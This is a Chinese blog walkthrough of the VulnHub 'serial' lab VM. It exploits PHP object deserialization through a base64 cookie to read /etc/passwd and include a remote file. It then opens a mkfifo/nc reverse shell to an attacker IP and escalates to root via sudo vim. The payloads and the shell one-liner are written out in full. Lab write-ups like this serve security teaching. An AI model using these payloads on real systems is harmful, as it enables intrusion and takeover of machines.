锐客网

  1. 首页 > it技术 > >

php反序列化靶机serial实战

靶机

靶机描述 今天研究一下php反序列化,靶机serial实战。目标为获取root权限。
靶机信息 可以去vulhub上下载此靶机:
https://www.vulnhub.com/entry/serial-1,349/
下载好,之后,使用Vmware新建虚拟机打开,步骤如下:

  • 1.首先创建新的虚拟机。
php反序列化靶机serial实战
文章图片

  • 2.然后选择客户机版本为Ubuntu 64位。
php反序列化靶机serial实战
文章图片

  • 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。
php反序列化靶机serial实战
文章图片

php反序列化靶机serial实战
文章图片

  • 4.打开虚拟机,环境配置完成。
php反序列化靶机serial实战
文章图片

渗透测试过程 探测主机存活(目标主机IP地址)
  • 使用nmap探测主机存活或者使用Kali里的netdicover进行探测。
-PS/-PA/-PU/-PY:这些参数即可以探测主机存活,也可以同时进行端口扫描。(例如:-PS,发送TCP SYN包进行主机探测)
扫描到存活主机:192.168.242.129,开放了22和80端口
php反序列化靶机serial实战
文章图片

访问web服务
  • 1.首先访问80端口,页面只有一行文本:Hello sk4This is a beta test for new cookie handler,提示这里是新cookie进行程序测试,那我们查看cookie。
php反序列化靶机serial实战
文章图片

  • 2.F12查看,是一串base64编码。
php反序列化靶机serial实战
文章图片

  • 3.使用burpsuite解码,是一串代码,下面有解释。
php反序列化靶机serial实战
文章图片

【php反序列化靶机serial实战】思路一:
  • 尝试逻辑绕过,将sk4换成admin,看看是否有什么信息。
php反序列化靶机serial实战
文章图片

  • 这里直接报500错误,没办法,只有找其他思路。
php反序列化靶机serial实战
文章图片

思路二:
目录扫描
  • 1.使用dirbuster工具进行扫描,这里扫到一个/backup/目录。
php反序列化靶机serial实战
文章图片

  • 2.打开查看,是一个zip文件,下载查看,是三个源代码文件。
php反序列化靶机serial实战
文章图片

php反序列化靶机serial实战
文章图片

代码审计
  • 1.通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。
php反序列化靶机serial实战
文章图片

  • 2.经过代码审计可构造payload,尝试读取passwd文件,payload如下:
    O:4:"User":2:{s:10:" User name"; s:5:"admin"; s:9:" User wel"; O:3:"Log":1:{s:8:"type_log"; s:11:"/etc/passwd"; }},然后在命令行窗口,打开python,添加base64模块,再经序列化和base64编码后,进行执行,但是一直不能成功执行。
php反序列化靶机serial实战
文章图片

php反序列化靶机serial实战
文章图片

  • 3.通过对比发现base64存在一定的不同,需要进行修改,将空格使用\x00替换,然后再进行编码读取/etc/passwd文件。
这里我们仍然使用python进行操作,首先使用replace()函数将payload中所有的空格替换成\x00:'O:4:"User":2:{s:10:" User name"; s:5:"admin"; s:9:" User wel"; O:3:"Log":1:{s:8:"type_log"; s:11:"/etc/passwd"; }}'.replace(' ','\x00'),然后再使用base64模块进行编码:base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name"; s:5:"admin"; s:9:"\x00User\x00wel"; O:3:"Log":1:{s:8:"type_log"; s:11:"/etc/passwd"; }}'),编码后的payload如下:Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==
php反序列化靶机serial实战
文章图片

  • 4.然后在burpsuite的repeater模块中,将payload赋值给cookie中的user,然后点击 [go],读取到passwd文件,可以看到可登录系统用户除了root,还有sk4。
php反序列化靶机serial实战
文章图片

获取shell
  • 1.因为这样执行命令不太方便,我们可以换一种方式,在本地打开web服务,上传一个txt文件,内容是:
php反序列化靶机serial实战
文章图片

  • 2.然后构造payload:O:4:"User":2:{s:10:"\x00User\x00name"; s:5:"admin"; s:9:"\x00User\x00wel"; O:3:"Log":1:{s:8:"type_log"; s:26:"http://本地IP/c.txt"; }},然后进行序列化和base64编码执行。
php反序列化靶机serial实战
文章图片

php反序列化靶机serial实战
文章图片

命令执行成功。
php反序列化靶机serial实战
文章图片

  • 3.添加反弹shell:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f,没有回应,但反弹shell成功。
php反序列化靶机serial实战
文章图片

php反序列化靶机serial实战
文章图片

提升权限
  • 1.查看系统版本,内核版本。
php反序列化靶机serial实战
文章图片

  • 2.查看根目录发现存在敏感文件credentials.txt.bak。
php反序列化靶机serial实战
文章图片

  • 3.打开查看是用户名和密码,SSH登录。
php反序列化靶机serial实战
文章图片

php反序列化靶机serial实战
文章图片

  • 4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。
php反序列化靶机serial实战
文章图片

  • 5.尝试提权,试试sudo vim,进入到命令模式输入!bash。
php反序列化靶机serial实战
文章图片

  • 6.提权成功。
php反序列化靶机serial实战
文章图片

    推荐阅读


      上一篇:2019适合年轻人创业的新项目有哪些(最有前景项目推荐)

      下一篇:1|SPI的应用,借鉴